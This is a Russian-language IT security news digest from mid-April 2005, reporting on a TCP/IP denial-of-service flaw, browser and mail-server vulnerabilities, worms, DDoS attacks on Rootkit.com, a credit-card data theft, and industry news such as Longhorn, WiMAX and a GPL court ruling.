Об уязвимости в реализациях TCP/IP стека многих ОС сообщает в Full-disclosure Diego Casati из Бразилии. Возможно, фраза "во многих" звучит не совсем верно, поскольку, по сообщению Диего, наличие уязвимости было проверено в локальной (интранет) сети в ОС Windows - 98SE/NT/2K/2K3/XP (с обоими сервис-паками) и Linux (проверялось ядро 2.4, однако не исключается наличие уязвимости и в 2.6). Уязвимость позволяет провести атаку, приводящую к DoS (как вариант - DDoS). Суть уязвимости заключается в том, что если послать в сторону корректно установленного TCP-соединения специально сформированный пакет с установленными флагами ACK/FIN и при этом пакет ACK будет некорректным (ack - 4byte) - произойдёт наводнение сетевого стека пакетами нулевой длины с установленным флагом ACK. Как показал сетевой анализатор, при этом соединение переходит в состояние "keep alive" и в течении 3 минут система наводняется несколькими миллионами пакетов. Это, в совю очередь приводит к исчерпанию системных ресурсов, и, как следствие, к полному зависанию системы. Как пишет сам автор, наиболее уязвимы для подобной атаки приложения и сервисы, которые зависят от QoS (quality of services), например, H323 приложения (VoIP) и поточное видео. Об уязвимости было сообщено бразильскому отделению Microsoft, однако, как пишет Диего, "они сообщили, что ничего не могут сделать". Не совсем понятно, почему автор не сообщил об уязвимости производителям и разработчикам Linux. CERT был поставлен в известность. Смое печальное в этой ситуации, что автор(ами) был выпущен рабочий (по их словам эксплоит), так что последствия этой уязвимости ещё наверняка дадут себя знать.
Описание и эксплоит

17/04/2005 14:32 Множественные уязвимости в Firefox и Mozilla Suite
Французская компания FrSIRT сообщает о наличии множественных уязвимостях в популярном браузере Firefox. Как пишет компания, подобных уязвимостей обнаружено 9 штук. Об уязвимостях в различное время сообщили moz_bug_r_a4, Georgi Guninski, Kohei Yoshino, Michael Krax, Doron Rosenberg, Omar Khan, Azafran Vladimir V. Perepelitsa. Последствия уязвимостей различны: от DoS до возможности выполнения проивольного кода в системе и похищения важных личных данных. Как указывается в сообщении, уязвимости подвержены все версии как Mozilla Firefox до 1.0.2, так и Mozilla Suite до 1.7.6. Рекомендуется обновиться до 1.0.3 (вышедшего на днях) и до 1.7.7, соответственно. Кроме того, доступен код эксплоита уязвимостей.
Описание
Эксплоит

17/04/2005 12:40 Митник ищет ключи к системам в мусорных корзинах
Не имеет смысла тратить миллионы долларов на информационную безопасность, если при этом сотрудники компании будут разглашать идентификационные данные для входа в системы. Такое мнение высказал бывший американский хакер Кевин Митник в ходе конференции в Сиднее, сообщает сайт ZDNet. Эффективным средством защиты конфиденциальной информации компаний может стать департамент, сотрудники которого будут реагировать на подозрительные запросы, считает Митник. По его словам, сотрудники департамента должны иметь хорошую подготовку в области социальной инженерии, уметь расследовать состоявшиеся и несостоявшиеся хакерские атаки и эффективно бороться с ними. Митник, который в настоящее время возглавляет собственное консалтинговое агентство Mitnick Security Consulting (прежнее название — Defensive Thinking) призывает компании инструктировать собственный персонал и укреплять так называемые «человеческие межсетевые экраны». Вместе со своим бизнес-партнером Алексом Касперавичусом Митник рассказал о некоторых методах, с помощью которых социальные инженеры обходят сложную техническую защиту компьютерных систем: «Хакер ищет слабое место, через которое получает доступ к информации. Программа защиты создается при участии людей, процессов и технологий. Ваша компания может быть сильна, например, в технологии, но люди при этом могут не знать, чего ждать от преступников. Преступники будут искать самые легкие места для вторжения». В качестве примера одного из самых простых источников информации Митник и Касперавичус назвали мусорные корзины. Они заявили, что перед полетом в Сидней побывали в офисе одной звезды шоу-бизнеса. Наряду с коробками из-под пиццы и пустыми банками, Митник и Касперавичус обнаружили в корзинах массу факсов, телефонных счетов, зарплатные листки и другие документы. Найденные предметы были предложены участникам конференции для исследования, которые сумели найти в «учебном материале» домашние и мобильные телефоны поп-звезд, в том числе Кристины Агилеры. Кроме того, в мусоре оказались адрес администраторской зоны сайта телевезионного реалити-шоу, логин и пароль администратора. «В мусоре можно найти расписания, названия проектов, распечатки программного кода, счета. Компании могут вести корпоративную разведку, не прибегая к хакерским атакам и промышленному шпионажу», — заявил Митник.
Viruslist

17/04/2005 11:45 WiMAX для жителей Москвы и области
Компания АСВТ начала проект по созданию высокоскоростной мультисервисной сети радиодоступа, основанной на технологии WiMAX в Москве и Московской области. Проект начнется с отработки технологии в ряде пилотных зон, различающихся типом застройки, степенью развития бизнеса и уровнем доходов населения. Первая зона в городе Люберцы позволит отработать предоставление услуг связи через базовые станции WiMAX, подключенные непосредственно к высокоскоростной волоконно-оптической транспортной сети АСВТ. Вторая, расположенная в подмосковном коттеджном поселке, предполагает подключение базовых станций с помощью радиорелейных линий, позволяющих "пройти" акватории водохранилищ. Третьей зоной выбран один из жилых районов Москвы. Сеть радиодоступа АСВТ рассчитана на предоставление всего комплекса инфокоммуникаицонных услуг от IP телефонии, высокоскоростного доступа в Internet и передачи данных до видеоконференцсвязи и интерактивного мультимедийного вещания. Поэтому в опытных зонах планируется отработать не только технические вопросы проектирования, построения и эксплуатации таких сетей, но и экономические модели, обеспечивающие окупаемость при невысокой абонентской плате.
"Открытые системы"

17/04/2005 11:32 Ранний взгляд на Longhorn
Продержав свою призовую корову в стойле несколько месяцев, Microsoft начала, наконец, выпускать Longhorn на всеобщее обозрение. Приступив на этой неделе к коротким демонстрациям для репортеров, производитель ПО постепенно проливает свет на то, что же предложит следующая версия Windows, когда выйдет на рынок в будущем году. Список новшеств возглавляют усовершенствования в области безопасности, средства локального поиска и организации информации, а также упрощенное переключение ноутбуков между разными сетями. «Это будет эпохальное событие, — сказал в четверг CNET News.com вице-президент отделения Microsoft Джим Оллчин. — Конечно, мы понимаем, что Longhorn вряд ли соберет толпы людей перед витринами магазинов, как это было в день выпуска Windows 95, но в этом продукте найдется что-нибудь для каждого, и он подхлестнет продажи ПК». Оллчин продемонстрировал несколько главных новинок ОС. Например, «панель быстрого поиска» позволяет набрать запрос и сразу увидеть соответствующие ему файлы. По форме механизм поиска напоминает функцию Spotlight в Mac OS X Tiger от Apple Computer, которая должна поступить в продажу в этом месяце. Результаты поиска можно сохранять как автоматически обновляемые виртуальные папки, содержащие все, что отвечает определенному запросу, такому как authored by Mary или containing the word 'Cleveland’. Документам, изображениям, музыке и даже приложениям можно будет присваивать рейтинг или ставить в соответствие ключевые слова, добавляя новые критерии поиска. Однако Оллчин подчеркнул, что несмотря на множество аналогий с Tiger, Microsoft сказала в Longhorn новое слово. Так, значки документов больше не подсказывают тип файла, а сами изображают эскизы этого файла. Например, значок документа Word — это уменьшенная копия первой страницы файла. Вид папок тоже позволяет получить представление об их содержании. Такие изображения могут быть весьма мелкими, но тем не менее дают намек, который помогает в процессе поиска.
Более подробно

17/04/2005 10:18 Fortinet признали виновной в нарушении GPL
Мюнхенский суд вынес предварительное решение по иску Гаральда Вельте (Harald Welte) к компании Fortinet (США), производящей разнообразные сетевые устройства, cообщает linuxcenter.ru. Суд постановил, что Fortinet нарушила лицензию GPL и лишил ее права распространять initrd как составную часть своих продуктов. "Fortinet не так давно узнала о претензиях г-на Вельте и тут же начала работу над устранением недостатков. ... Поэтому мы удивлены тем, что г-н Вельте запросил предварительное решение мюнхенского суда и не считаем, что это шаг бы необходим",-сообщил представитель компании. Гаральд Вельте известен как один из разработчиков Linux, а также содержатель сайта GPL Violations.
Подробности

16/04/2005 17:31 Выход Mozilla FireFox 1.0.3
Вышла новая версия браузера Mozilla Firefox 1.0.3. Новая версия исправляет несколько критических уязвимостей браузера, о которых сообщалось ранее. Каких-либо нововведений в браузере нет. Также отмечается, что некоторое количество расширений браузера перестанут работать.
Анонс

16/04/2005 17:19 Госконтроль над Рунетом уже установлен
Несмотря на неоднократные заявления министра информационных технологий и связи Леонида Реймана о том, что он против регулирования интернета, на самом деле, Мининформсвязи уже вовсю его контролирует. Как стало известно «Вебпланете», руководство этого ведомства во вторник оказало беспрецендентное давление на ряд крупнейших интернет-изданий, вынудив их снять заметки о нелицеприятном для министерства событии. «Вебпланета» уже сообщала о том, что в понедельник в Москве на Пушкинской площади состоялся митинг пенсионеров, протестующих против политики Мининформсвязи и лично министра Леонида Реймана. Стоит отметить, что в адрес министра уже давно звучат обвинения в коррупции. Однако впервые его деятельность стала повлекла за собой проведение народной акции протеста. Обвинение было выдвинуто действительно серьезное: выступивший на митинге депутат ГосДумы Игорь Морозов назвал Реймана «истинным виновником антисоциальной политики». По его словам, «в недавно начавшихся задержках выплат пенсий через почтовые отделения и почтовых денежных переводов виноват „Связь-банк“, который в прошлом году с подачи Реймана был продан структурам его давнего „подельника“ — датского юриста Джефри Гальмонда. И теперь „Связь-банк“, обслуживающий банковские счета ФГУП „Почта России“, прокручивает в своих целях деньги, причитающиеся пенсионерам». О произошедшем событии событие сообщили ряд интернет-СМИ. Естественно, это не могло понравится Мининформсвязи, которое решило провести «рейд» по Рунету, стараясь очистить от упоминаний о случившемся мероприятии. Как сообщил «Вебпланете» один из организаторов митинга, первый заместитель министра связи Дмитрий Милованцев, стараясь защитить честь своего шефа, лично позвонил руководству холдинга РБК (в который входит издание Cnews) и потребовал снять сообщение. В противном случае Милованцев, курирующий в своем ведомстве экономические вопросы, пригрозил не выплачивать деньги по одному из рекламных контрактов, заключенному между РБК и Мининформсвязи. Точнее, Миинформсвязи и так задолжали по данному контракту, но Милованцев пообещал, что если статья не будет снята, долг вообще никогда не будет выплачен. Аналогичное давление было оказано и редакцию сайта Comnews, также имеющего рекламные контракты с Мининформсвязи. В итоге с сайтов изданий Cnews и Comnews были удалены соответствующие материалы. Статья на Cnews находилась здесь, а статья на Comnews — здесь. Часть статьи с Cnews можно прочитать на сайте «Нижегородского агентства политических новостей». Анонсы «убитых» сообщений можно найти также с помощью службы «Яндекс.Новости»: анонс новости с Cnews с фотографией чучела Реймана, анонс новости с Comnews — первый в списке. Примечательно, что обе заметки никак нельзя было отнести к разряду «заказных». Так, в обоих материалах были приведены слова представителей Мининформсвязи о том, что «организаторы пикета просто-напросто заплатили митингующим за участие в данной акции». Очевидно, что Мининформсвязи, чувствую себя хозяином Рунета, хочет, чтоб о самом факте митинга никто вообще не узнал.
"Вебпланета"

16/04/2005 16:06 Британские банки вводят эшелонированную оборону
В скором времени крупнейшие банки Великобритании введут в действие механизм двухуровневой аутентификации клиентов, в которую будут включены аппаратные генераторы паролей. В минувшем году компьютерное мошенничество стоило британским банкам свыше двадцати миллионов долларов. Не желая и далее мириться с таким положением дел, крупнейшие финансовые институты королевства пришли к решению о создании объединенной системы двухуровневой аутентификации клиентов, которая, как считают эксперты, позволит значительно повысить безопасность онлайн-транзакций. В основе системы будет стоять аппаратный генератор паролей, который, по всей видимости, будет изготовлен по той же схеме, что и уже выпускаемые рядом производителей "парольные брелоки". Каждый сгенерированный прибором пароль будет использован только для проведения одной транзакции. Пароль, судя по всему, будет генерироваться на основе публичного ключа, выдающегося собственно банком. Точная спецификация генератора будет определена ближе к маю, а массовый выпуск устройств, как пишет CNET, начнется в течение последующих 9-12 месяцев.
Internet.Ru

16/04/2005 15:34 Крупнейший кабельный провайдер США утомил клиентов плохой связью
Клиенты крупнейшего в США кабельного провайдера широкополосной интернет-связи Comcast на протяжении этой недели испытывали регулярные затруднения в работе с Интернетом и, в частности, с электронной почтой. Скачкообразные "падения" качества связи наблюдались у многих из числа 7 миллионов клиентов в 35 штатах. Представители администрации компании признали наличие проблемы, но сообщили, что причина ее возникновения точно не установлена. Предположительно, трудности связаны с неадекватной работой DNS-серверов компании, которые обеспечивают преобразования доменных имен в цифровые IP-адреса. Отмечается, что затруднения в работе провайдера наблюдались в основном в вечерние часы. Технические службы провайдера работают над разрешением проблемы, однако о том, что им это удалось, пока не сообщалось. Некоторые клиенты заявляют, что проблемы со связью их раздражают, а в техническую поддержку дозвониться очень трудно. Некоторые компетентные в техническом отношении пользователи предпочли решить проблемы путем подключения к альтернативным DNS-серверам, отмечает интернет-издание Mercury News.
Подробности

15/04/2005 13:45 Разогнанные процессоры "подмочили" репутацию Windows
Один из разработчиков Windows Реймонд Чен (Raymond Chen), заявил, что причиной частых необъяснимых зависаний операционной системы могут являться разогнанные процессоры, пишет РС Рro. По его словам, корпорация иногда получает отчеты о таких ошибках, которые в принципе не должны происходить. Проведенное исследование показало, что данные отчеты приходят с компьютеров с разогнанными процессорами. Специалисты Microsoft посоветовали страдающим от ошибок либо отказаться от разгона, либо снизить его масштаб. «Во всех случаях, когда пользователи следовали нашим советам, они говорили, что их компьютер, который ранее регулярно зависал, теперь работает без перебоев», — сказал г-н Чен. «Мораль данной истории такова: разогнанные процессоры создают Windows плохую репутацию», — утверждает разработчик.
CNews

15/04/2005 13:02 Новая мутация червя Kelvir
Вчера "Лаборатория Касперского" сообщила об обнаружении новой разновидность червя семейства IM-Worm.Win32.Kelvir — она получила версию Kelvir.k. Как обычно, Kelvir распространяется с ботом, который мы определяется как Backdoor.Win32.Rbot.gen. Новый вариант Kelvir использует любопытный метод социального инжиниринга: вместо отправки ссылки на pif- или scr-файл, червь рассылает ссылку на файл с расширением php. Обработчик php-файлов позволяет добавлять к ним любые цифры и буквы — в виде запросов, после символа «?». Именно это делает Kelvir.k — указывает после php-файла электронный адрес пользователя MSNM. Например: Email пользователя №1: some@thing.qqq; Email пользователя №2: other@thing.zzz. Пользователь №1 получает ссылку, которая выглядит следующим образом: http://www.[edited].us/[edited]/pictures.php?email=some@thing.qqq. Пользователь №2 получает ссылку, которая выглядит следующим образом: http://www.[edited].us/[edited]/pictures.php?email=other@thing.zzz. Когда пользователь щелкает по ссылке, ему выдается предложение запустить или сохранить файл. По идее, уже на этом этапе большинство пользователей заподозрят неладное и не станут сразу запускать этот файл. Однако, как только пользователь щелкает по ссылке, злоумышленники получают адрес его электронной почты. То есть, адрес попадает в спамерские базы даже если сам червь так и остается не активированным. Вызвана ли эта новая тактика сбора адресов появившимися в MSNM 7 защитными функциями? Не думаю. Пока писался этот текст, мы обнаружили перепакованную версию Kelvir.e. А Kelvir.e для своего размножения использует ссылку на scr-файлы, которые не фильтруются MSNM 7.
Веблог "Лаборатории Касперского"

15/04/2005 12:37 Обиженные хакеры вывели из строя Rootkit.com
Два сайта, размещающих информацию о программном обеспечении для удаленного доступа, были выведены из строя в результате DDoS-атак. Таким образом организаторы атак отомстили администраторам сайтов за нелестные комментарии на форумах в свой адрес, сообщает Techworld.com. В результате атаки сайт Rootkit.com, созданный экспертом по безопасности Грегом Хогландом (Greg Hoglund), был недоступен пользователям почти неделю. Из строя были выведены еще два сайта, созданных и поддерживаемых разработчиком руткитов с псевдонимом «Святой отец». Возможными организаторами атак называют группу болгарских и турецких хакеров SIS-Team. Атака против Rootkit.com началась 5 апреля, после того как пользователь ATmaCA разместил в одном из форумов послание, рекламирующее ряд вредоносных шпионских разработок хакерской группы SIS-Team. В числе указанных программ были перечислены SIS-Downloader, ProAgent и SIS-IExploiter. Все эти программы при комбинированном использовании позволяют атаковать другие компьютеры, используя веб-ресурсы. Сообщение пользователя ATmaCA вызвало массу ответов членов сообщества Rootkit.com, которых возмутило использование форума в качестве коммерческой рекламной площадки. Все остальные программы, обсуждение которых ведется на форумах Rootkit.com, имеют открытый код и их создатели, как правило, размещают его на своих сайтах. В дискуссии, которая разгорелась между членами SIS-Team и Rootkit.com, были заданы вопросы о качестве программ SIS-Team. Некоторые представители Rootkit.com предположили, что рекламируемый софт написан плохо и часто выводит из строя машины, на которые его устанавливают. В течение нескольких часов после размещения первого сообщения ATmaCA Rootkit.com был атакован сетью более, чем из 500 машин, которые посылали на сервер около 170 тысяч запросов в секунду. Таким образом для большинства пользователей сайт оказался недоступен. Сайты «Святого отца» были атакованы, поскольку он также разместил несколько высказываний в адрес ATmaCA и SIS-Team. Администраторам атакованных сайтов были направлены письма, авторы которых требовали публикации извинений перед ATmaCA и SIS-Team. В случае публикации извинений атаки было обещано прекратить. «Я нахожу отвратительным то, что сайт, предназначенный только для размещения информации, подвергается нападению недоразвитых детей. Эти хакеры не могут отстоять свои позиции. Они заявляют о своих программах, но не могут вести о них спор и атакуют своих противников», — прокомментировал инциденты Грег Хогланд. На сайте Rootkit.com зарегистрировано более 25 тысяч пользователей. Материалы для сайта регулярно создают около 30 человек. Несмотря на то, что руткиты имеют репутацию хакерских инструментов, многие пользователи Rootkit.com — профессиональные эксперты и студенты, занимающиеся вопросами компьютерной безопасности. С помощью открытых кодов, размещаемых на Rootkit.com, они разрабатывают методы защиты от хакерских программ.
VirusList

15/04/2005 11:53 У модельеров Ralph Lauren похитили данные о кредитных карточках тысяч клиентов
У известной компании - производителя одежды Polo Ralph Lauren Corp. похитили данные о кредитных карточках тысяч ее клиентов, сообщает АР. В четверг представитель банка HSBC Стивен Коэн (Stephen Cohen) сообщил, что могли быть похищены личные данные владельцев примерно 180 тысяч кредитных карточек MasterCard, выпущенных HSBC. Коэн уточнил, что банку еще неизвестно, стали ли кто-либо из его клиентов жертвой мошенничества. "Мы хотим защитить счета своих клиентов и поэтому предупреждаем их", - пояснил он. С заявлением о возможной уязвимости своих клоиентов выступили и представители Citigroup Inc. Представители MasterCard International подтвердили, что получили информацию о возможной утечке данных о банковских операциях еще в январе 2005 года и, известив все банки, входящие в их систему, приступили к расследованию происшедшего. Представители Visa USA также сообщили, что им известно о происшедшем и они также предпринимают все возможные меры для предотвращения возможных мошенничеств при помощи похищенных данных. Ни Коэн, ни представитель MasterCard International не сообщили, где именно были похищены данные, однако ранее журналисты The Wall Street Journal, со ссылкой на "осведомленный источник", сообщили, что речь идет о Polo Ralph Lauren Corp. Представители компании никак не прокомментировали эту информацию. Каким именно образом были похищены данные не сообщается. В предыдущих подобных случаях злоумышленниками оказывались хакеры, получавшие доступ в сеть различных компаний.
Подробности

15/04/2005 10:11 Каждый российский сайт имеет в среднем 6 уязвимостей
6 уязвимых мест имеет в среднем каждый российский интернет-проект. К такому выводу привели совместные исследования хостинг-провайдера .masterhost и компании Positive Technologies. Как сообщил ИА Regnum генеральный директор компании .mastermedia (группа компаний .masterhost) Руслан Курепин, реализация совместной программы .masterhost и Positive Technologies по тестированию интернет-проектов с целью выявления возможных уязвимостей в программном обеспечении сайтов началась полгода назад. К марту 2005 года было просканировано 22.000 сайтов, каждый из которых был проверен от 1 до 7 раз. В результате сканирования было выявлено почти 6.000 сайтов, имеющих уязвимости средней степени, и более полутора тысяч сайтов, имеющих критические уязвимости. Это значит, отметил Р.Курепин, что любой из этих интернет-проектов мог подвергнуться атаке злоумышленников с гарантированным успехом получения закрытой информации или повреждения данных. Количество всех собранных уникальных уязвимостей составило поистине шокирующую цифру - 132.387 уязвимостей на 22.000 проектов. То есть, в среднем в российском интернете приходится по 6 уязвимых мест на каждый интернет-проект. Ситуация усугубляется еще и тем, что каждую неделю обнаруживаются все новые и новые способы проникновения или повреждения данных, следить за появлением которых в состоянии только профессиональные организации, специализирующиеся на информационной безопасности.
SecurityLab

15/04/2005 09:28 19 апреля - 40 лет закону Мура
19 апреля 1965 года в своей статье, посвященной 35-ой годовщине журнала Electronics, Гордон Мур (Gordon E. Moore) дал прогноз развития микроэлектроники, известный ныне как "закона Мура" (Moore's law). Закон Мура - неофициальный закон. Он не является юридическим понятием. Это скорее удачно подмеченная тенденция развития электронной промышленности. Первоначально Мур предугадал, что что количество транзисторов на чипе будет увеличиваться вдвое каждые 12 месяцев. Коррективы в свой закон Мур внес в 1975 году, выступая на конференции "International Electron Devices Meeting". Тогда он предположил, что при производстве все более сложных чипов удвоение числа транзисторов будет происходить каждые два года. Впрочем, в последнее время создается все более сильное ощущение, что этот закон протянет еще недолго.
Bugtraq.ru

15/04/2005 09:10 Firefox привлек в марте 2,6 млн посетителей
Браузер Firefox продолжает служить маяком для многих пользователей интернета. В марте свыше 2,6 млн людей посетили веб-сайт Firefox, чтобы получить больше информации о программном обеспечении open source и, возможно, скачать его, утверждает аналитическая фирма Nielsen/NetRatings. Эти данные превышают количественные показатели января (2,2 млн) и февраля (1,6 млн). Число приверженцев Firefox продолжает расти с прошлого года, и теперь на его долю приходится примерно 5% рынка браузеров. Эта доля невелика, однако с появлением браузера — который привлекает внимание отчасти как альтернатива Microsoft Internet Explorer — доля рынка доминирующего IE опустилась ниже 90%. «Firefox предоставляет веб-серферам простой инструмент, который блокирует незатребованные окна, меньше подвержен вирусным атакам и предлагает уникальные средства навигации по нескольким сайтам в одном окне браузера», — говорит директор по стратегической аналитике Nielsen/NetRatings Кен Кассар (Ken Cassar). Сайт Firefox впервые перешел границу минимального уровня посещаемости, требуемого Nielsen/NetRatings, в июне 2004 года, когда набрал 795 тыс. посетителей. Аналитическая фирма сообщает также, что на Mozilla.org, веб-сайте группы Mozilla Foundation, разработавшей Firefox, в марте было зарегистрировано 4,1 млн уникальных посетителей. Это больше, чем в январе (3,4 млн) и феврале (3,1 млн), и значительно больше, чем в марте 2004 года (1,1 млн).
ZDNet

14/04/2005 17:19 МВД Республики Беларусь начало охоту на хакеров
МВД Беларуси начало охоту на школьников и студентов. Отдельными воспитанниками учебных заведений заинтересовался засекреченный отдел по борьбе с преступлениями в сфере высоких технологий. На днях в его кабинетах было возбуждено сразу два уголовных дела в отношении минского школьника, который, по мнению оперативников, нанес значительный финансовый ущерб белорусским интернет-провайдерам. На данный момент в уголовных делах фигурирует незаконное подключение к интернету и внесение в служебную сеть провайдеров ложной информации. Школяра обвиняют сразу по двум статьям Уголовного кодекса, каждая из которых грозит солидным тюремным срокам. Если юного хакера признают виновным, ему придется возместить частным компаниям и некоторым их клиентам материальный, а возможно, еще и моральный ущерб. По словам сотрудников правоохранительных органов, с легкой руки хакера провайдерам пришлось отлучить от интернета нескольких клиентов, которые честно внесли аванс за пользование информационной сетью. Ожидается, что судебные слушания начнутся уже этим летом. До начала разбирательств следователи разрешили обвиняемому посещать занятия, взяв с него подписку о невыезде. Запирать ребенка в тюремной камере нет резона. К тому же претендентов на место в следственном изоляторе в хакерской среде хоть отбавляй. В последнее время в Беларуси зафиксирован всплеск компьютерной преступности. Оперативники жалуются, что в большинстве случаев им приходится иметь дело не с матерыми преступниками и рецидивистами, а со школьниками и студентами. Буквально из каждого виртуального ограбления или мошенничества, произошедшего в Беларуси, торчат детские уши. Вместо того чтобы развлекаться со сверстниками на дискотеках и слушать познавательные идеологические лекции, подростки ломают сайты и пробуют получить доступ к государственным секретам. По последним данным, белорусские хакеры неоднократно покушались на сайты министерств и ведомств. К счастью, до взлома платежных банковских систем дело пока не доходило. По словам председателя совета директоров портала TUT.By Юрия Зиссера, дети сами не понимают, что творят.
Crime-Research

14/04/2005 16:47 Хакеры используют блоги для распространения вирусов
Блоги постепенно перестают быть тихим и безопасным островком для непринужденного трепа. Хакеры все чаще используют этот сервис для распространения вирусов, троянов и прочей заразы. «Все чаще в блогах обнаруживается вирусный код», — говорит Дэн Хаббард (Dan Hubbard), директор по безопасности и технологическим разработкам компании Websense. По словам господина Хаббарда, с начала года было обнаружено несколько сотен блогов, в которых так или иначе хранился вредоносный код. «Это уже становится обычным явлением. когда кейлоггеры, трояны и прочие вирусы хранятся на блогах и обновляются оттуда», — добавил Хаббард. Причины, по которым хакеры перестают пользоваться обычными сайтами для распространения своих творений, очевидны. Обычно сервисы блогов предоставляют неограниченное пространство на сервере, к тому же, для размещения информации на блоге не требуется никакой авторизации или индентификации. При этом, большинство блогов не сканируют содержимое блогов на наличие вирусов, шпионских программ и троянов. Разные хакеры используют блоги по-разному. Одни размещают на нем вредоносный код и потом при помощи спама или спима заманивают интернетчиков на зараженную страницу. Если у посетителя есть бреши в безопасности, то вирус с зараженной страницы проникает на компьютер. Другие хакеры использую блоги просто как хранилище вирусных программ, совмещенное с функцией update-сервера. Блоги стали отличным «анонимайзером» для хакеров. Поскольку для регистрации на блогах не нужно сообщать о себе никакой персональной информации, блог становится еще одной преградой на пути поимки преступника правоохранительными органами. Таким образом, совет пользователям интернета остается прежним: вовремя ставить заплатки, не открывать неизвестные вложения к письмам, не ходить по линкам, пришедшим неизвестно откуда, передает InformationWeek.
"Вебпланета"

14/04/2005 15:45 OpenOffice.org подтвердила факт наличия уязвимости в своем продукте
Вместе с тем, компания заявляет, что дыра, обнаруженная в офисном пакете OpenOffice Version 1.1.4 и OpenOffice Version 2.0 beta, уже практически закрыта: заплатка будет выпущена в течение ближайших часов. По информации CNET, ссылающегося на официальное заявление OpenOffice.org, уязвимость таится в одной специфической функции программы и может быть использована с помощью специальным образом подготовленных файлов. Ошибка эта достаточно серьезна: в случае успешной атаки, злоумышленник может взять под контроль удаленную систему и исполнить на ней любой код. Компания Secunia присвоила уязвимости степень "умеренно критической".
Источник

14/04/2005 15:29 Уязвимость в Postfix
Обнаружена уязвимость в компоненте MTA Postfix - Gld - Greylisting демоне. Файл 'server.c' содержит код, позволяющий выполнить переполнение буфера. Удалённый пользователь может сформировать специальное почтовое сообщение, для того, чтобы вызвать переполнение и выполнить произвольный код в системе. Кроме того, файл 'cnf.c' содержит уязвимость формата строки (format string vulnerabilities), что позволяет удалённому пользователю передать данные системному вызову syslog() без требуемого идентификатора формата строки, что, в свою очередь, также позволяет выполнить произвольный код в системе с привилегиями суперпользователя.
Подробности

14/04/2005 14:36 IBM охотится за программистами Firefox
Ввиду того, что браузер Firefox приобретает все большую популярность, компания IBM решила обогатить штат своей организации программистами, специализирующимися именно на этом браузере. Это обусловлено тем, что компания хочет максимально адаптировать свои серверы для браузера Firefox. Информация об открытых в IBM вакансиях была опубликована на официальном сайте компании и содержала подробное описание того, какие навыки требуются от кандидатов. В частности, программист должен иметь опыт работы с технологией XPCOM и Gecko. Кроме того, ранее было объявлено, что IBM инвестирует $100 млн. в расширение поддержки Linux и развитие технологий программных продуктов IBM Workplace. Среди возможностей Workplace называются интернет-пейджер, а также функции коллективной работы.
CNews

14/04/2005 14:13 Panda Software предупреждает о новой растущей угрозе - руткиты
По данным антивирусной лаборатории Panda Software, замечено растущее количество вредоносных программ, известных как руткиты, для Windows. Хотя нет данных об их массивном использовании для атак Windows, настоящее распространение показывает, что за короткие сроки они могут стать основным средством хакеров для выполнения их вредоносных действий. Луис Корронс, глава PandaLabs, объясняет, что “решения безопасности развиваются, но то же самое делают и хакеры в поисках новых путей незаметного проникновения в системы. Несмотря на то, что они не являются чем-то новым, руткиты были заново открыты как вид вредоносного ПО, которое может помочь хакеру незаметно выполнять множество вредоносных действий. Мы видели, как они были использованы в комбинации с бэкдорами (backdoor) для установления удаленного контроля над компьютерами”. Руткиты – это действительно классика вредоносных кодов, так как впервые они появились около 10 лет назад. Они являются утилитами, которые используют хакеры для сокрытия своей вредоносной активности. Для этого они модифицируют операционную систему на компьютере, и могут даже заменять основные функции. Это значит, что они не только скрывают свое собственное присутствие, но также и действия, которые предпринимает злоумышленник на зараженном компьютере. Более того, руткит может скрывать присутствие других вредоносных программ на компьютере, просто изменяя файловые данные, ключи реестра или активные процессы. До настоящего момента руткиты представляли собой серьезную проблему для окружений Unix, платформы, для которой были изначально разработаны. Даже их название – это производная от ‘суперпользователя’ Unix, известного как “root”, обладающего полными правами и привилегиями в системе.
Panda Software

14/04/2005 13:11 Новое средство защиты от Trend Micro
Компания Trend Micro выпустила систему OfficeScan v7.0 решение для защиты серверов и клиентов, которое объединяет расширенные средства защиты от вирусов и шпионских программ. OfficeScan защищает такие конечные точки сети, как настольные компьютеры, ноутбуки и сетевые серверы, потребляя при этом минимальный объем ресурсов. Масштабируемая оболочка этого решения позволяет отдельным пользователям или их группам настраивать параметры политик, а также поддерживает координацию с другими продуктами и услугами в области защиты от компании Trend Micro. Опциональные службы Damage Cleanup Services помогают автоматически удалить следы атак, а также восстанавливать предыдущее (до атаки) состояние клиентов и серверов без какого-либо вмешательства администратора. OfficeScan v7.0 интегрируется с Cisco Trust Agent технологией, которая распространяется компанией Cisco Systems через программу Network Admission Control (NAC). Эта программа помогает реализовать политики безопасности и обеспечивает защиту от вирусов и червей. В настоящее время локализована клиентская часть продуктов Trend Micro, а также переведена на русский язык рабочая документация. OfficeScan предлагается в двух версиях: OfficeScan Client Edition (централизованная защита от угроз для настольных компьютеров в рамках всей сети, вместе с персональным межсетевым экраном) и Enterprice Suite with OfficeScan Client/Server Edition (полная антивирусная и "антишпионская" защита от Internet-угроз на уровне сетевого сервера и сетевых клиентских устройств, вместе с персональным межсетевым экраном для настольных компьютеров).
"Открытые системы"

14/04/2005 12:49 Компания Oracle запустила уникальную "космическую лотерею"
Компания Oracle в партнёрстве с компанией SpaceAdventures 4 апреля запустила уникальную лотерею. Главный приз - суборбитальный полёт в космос, сообщает "Компьюлента". Как указано в условиях, в лотерее могут участвовать разработчики программного обеспечения, использующие в работе продукты Oracle и проживающие в Великобритании, Франции, Германии, Нидерландах, Бельгии, Люксембурге, Дании, Италии, России, Южной Африке и Швеции. Будут проведены три ежемесячных розыгрыша, а в середине июля 2005 года - главный, в котором и определится окончательный победитель. Его наградой станут полёт в космос и сумма 35 тыс. долларов США наличными. Помимо этого главного приза предусмотрены два "первых" - ноутбуки Apple PowerBook G4 с 17-дюймовыми дисплеями, пять вторых призов - MP3-плееры Apple iPod 20GB и десять третьих - DVD-версии трилогии "Звёздные Войны".
Информация о лотерее

14/04/2005 12:04 Хакеры атаковали японские правительственные сайты
Вчера злоумышленники атаковали сразу несколько японских правительственных сайтов, сообщает РИА "Новости". В частности, с 21:00 в среду до 03:00 в четверг по местному времени был "парализован" интернет-ресурс Главного полицейского управления Японии. В среду ночью хакерская атака была совершена и на сайты Управления национальной обороны страны. Работу этих веб-страниц не удалось восстановить до сих пор. По словам представителя японского военного ведомства, можно почти с полной уверенностью сказать, что атаки производятся китайскими хакерами. Злоумышленники распространяют по интернету призывы к компьютерщикам КНР препятствовать работе японских сайтов. "Виртуальная война" вызвана резким обострением антияпонских настроений в КНР. На прошлой неделе в Пекине и на юге страны, в Шэньчжэнь и Чжэнду, проводились агрессивные демонстрации, где многочисленные демонстранты жгли японские флаги и забрасывали здание японского консульства камнями и бутылками. В Шанхае были избиты два японских студента.
РИА "Новости"

